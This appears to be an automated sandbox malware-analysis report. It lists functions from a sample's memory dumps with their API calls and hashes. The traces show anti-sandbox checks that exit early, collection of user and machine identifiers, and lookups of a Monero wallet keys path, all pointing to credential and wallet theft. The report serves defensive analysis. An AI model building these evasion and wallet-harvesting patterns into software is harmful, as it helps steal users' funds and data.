Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
Instruction ID: 36abd1045e1095e77d9ad8f28a5e2872a09a5cecefd765e79e11495b3271601a
Opcode Fuzzy Hash: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
Instruction Fuzzy Hash: FB014FB5A04204BBFB01DBE4EC49F6AB7BCEB58701F104455FE04E72A1E6749908AF61

Function 00357720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357734
RtlAllocateHeap.NTDLL(00000000), ref: 0035773B
RegOpenKeyExA.KERNEL32(80000002,0135B930,00000000,00020119,003576B9), ref: 0035775B
RegQueryValueExA.KERNEL32(003576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0035777A
RegCloseKey.ADVAPI32(003576B9), ref: 00357784

Strings

CurrentBuildNumber, xrefs: 00357771

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
Instruction ID: 646d133466b63d659c529316b03f6276edb238f33e1f64e9b1c784a0c6c1cccc
Opcode Fuzzy Hash: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
Instruction Fuzzy Hash: 6E01FFB5A40308BBFB00DBE4DC4AFAEB7B8EB58701F104559FE05B7291DA745A049F61

Function 003569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,013606F0), ref: 003598A1
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360600), ref: 003598BA
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,013607F8), ref: 003598D2
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360618), ref: 003598EA
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360630), ref: 00359903
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01368B30), ref: 0035991B
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,013567A0), ref: 00359933
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01356900), ref: 0035994C
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360648), ref: 00359964
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360660), ref: 0035997C
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360708), ref: 00359995
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360678), ref: 003599AD
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,013569E0), ref: 003599C5
Part of subcall function 00359860: GetProcAddress.KERNEL32(75900000,01360750), ref: 003599DE

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 003411D0: ExitProcess.KERNEL32 ref: 00341211

Part of subcall function 00341160: GetSystemInfo.KERNEL32(?), ref: 0034116A
Part of subcall function 00341160: ExitProcess.KERNEL32 ref: 0034117E

Part of subcall function 00341110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
Part of subcall function 00341110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
Part of subcall function 00341110: ExitProcess.KERNEL32 ref: 00341143

Part of subcall function 00341220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
Part of subcall function 00341220: ExitProcess.KERNEL32 ref: 00341294

Part of subcall function 00356770: GetUserDefaultLangID.KERNEL32 ref: 00356774

Part of subcall function 00341190: ExitProcess.KERNEL32 ref: 003411C6

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01368A10,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
CloseHandle.KERNEL32(00000000), ref: 00356AF9
Sleep.KERNEL32(00001770), ref: 00356B04
CloseHandle.KERNEL32(?,00000000,?,01368A10,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
ExitProcess.KERNEL32 ref: 00356B22

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
Instruction ID: fb08d099a272fc85193b19a40129ac7c8c600d824d8a92146aee17965a2e63c1
Opcode Fuzzy Hash: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
Instruction Fuzzy Hash: 6A313070904608AADB06F7F0DC57FEE7778AF14342F404619F902AA1A1EF70694DE7A2

Function 003499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
LocalFree.KERNEL32(0034148F), ref: 00349A90
CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
Instruction ID: 3e49d0057a4146cdc5570851fe0a286c16b39f9ba38fce7fba9f1a6df771523a
Opcode Fuzzy Hash: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
Instruction Fuzzy Hash: 87314BB4A00209EFDB15CF94C885FAE77F9FF48300F108159E901AB290D778AA45DFA1

Function 00354780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0136DF10), ref: 003547DB

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354801
lstrcat.KERNEL32(?,?), ref: 00354820
lstrcat.KERNEL32(?,?), ref: 00354834
lstrcat.KERNEL32(?,0135B1D0), ref: 00354847
lstrcat.KERNEL32(?,?), ref: 0035485B
lstrcat.KERNEL32(?,0136D6B8), ref: 0035486F

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F

Part of subcall function 00354570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
Part of subcall function 00354570: RtlAllocateHeap.NTDLL(00000000), ref: 00354587
Part of subcall function 00354570: wsprintfA.USER32 ref: 003545A6
Part of subcall function 00354570: FindFirstFileA.KERNEL32(?,?), ref: 003545BD

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 690da67d5f222a61ec1b7e68868fb551af3d5f06e4e4a46d348fbab67356fae2
Instruction ID: 6d52ff76d37b53a67a2940aebf1bf5ec090f40a33e5bdfc5afd630c6b745e609
Opcode Fuzzy Hash: 690da67d5f222a61ec1b7e68868fb551af3d5f06e4e4a46d348fbab67356fae2
Instruction Fuzzy Hash: C93184B290020857DB16FBB0DC85EED737CAB58701F404589BB15BA091EE74978DCFA1

Function 003540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0136D758,00000000,00020119,?), ref: 003540F4
RegQueryValueExA.ADVAPI32(?,0136DF70,00000000,00000000,00000000,000000FF), ref: 00354118
RegCloseKey.ADVAPI32(?), ref: 00354122
lstrcat.KERNEL32(?,00000000), ref: 00354147
lstrcat.KERNEL32(?,0136DE98), ref: 0035415B

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 09582a27d03ae7748a39495e5a573df7e44dff7e1c6cae00b2d11cc05a85fbe0
Instruction ID: 660817587544a4cfa4a1c82c69960a6a0fe0a2e9683cdc74fb0cf50b39effc6c
Opcode Fuzzy Hash: 09582a27d03ae7748a39495e5a573df7e44dff7e1c6cae00b2d11cc05a85fbe0
Instruction Fuzzy Hash: 8041CCB6D001086BEB15EBA0DC46FFD737DA798300F004559BF156B191EA755B8C8BD2

Function 6C65C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C65C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C65C969
GetSystemInfo.KERNEL32(?), ref: 6C65C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C65C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C65C9E2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 9d98853bfd446a1e524ea0378fb2131f05ab827a18d065d100a3bbd93dcf27b0
Instruction ID: c98ffd7a96004471f613d98777d1863b52f7e9bee224c29abf004df83d6a9c24
Opcode Fuzzy Hash: 9d98853bfd446a1e524ea0378fb2131f05ab827a18d065d100a3bbd93dcf27b0
Instruction Fuzzy Hash: C921F9717412147BDB14AA25CCC4BAE73B9AB8B744FA0051AF907E7B80DB706E1087AD

Function 00357E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
RegOpenKeyExA.KERNEL32(80000002,0135BB98,00000000,00020119,?), ref: 00357E5E
RegQueryValueExA.KERNEL32(?,0136D438,00000000,00000000,000000FF,000000FF), ref: 00357E7F
RegCloseKey.ADVAPI32(?), ref: 00357E92

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
Instruction ID: 38aa2d2837a1247cfd1439d7271eefffb1cf5691b50c57322996df3599613793
